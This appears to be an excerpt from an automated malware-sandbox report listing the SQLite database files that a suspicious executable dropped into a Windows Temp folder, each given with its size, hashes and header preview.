                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\8Kcl6H1Wv9

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\8OacltquOQ

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\96vx87EYSZ

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\9QX5SrMSF8

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\9WCwR03Tll

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\9XP9VkYdpp

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\9hIDYPT4Yj

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\AMk9hR1aea

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\AQKMIm5E52

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\AW9RIju1uD

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Av76dmOh3k

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\BN3FoUTZpy

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Bi5oUXUrrv

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\CChzuaKY4Y

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Cty474mZBv

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\DJ8fk1IMXX

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):98304
                                                                                Entropy (8bit):0.08235737944063153
                                                                                Encrypted:false
                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\F7A5t9Tfrd

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\FCLt0tcspk

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Fd2yfpRis1

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\G2MVxHtjJs

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\GQf6nthSwP

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\GmIRbxFjNC

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\HM3v0mxl9t

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
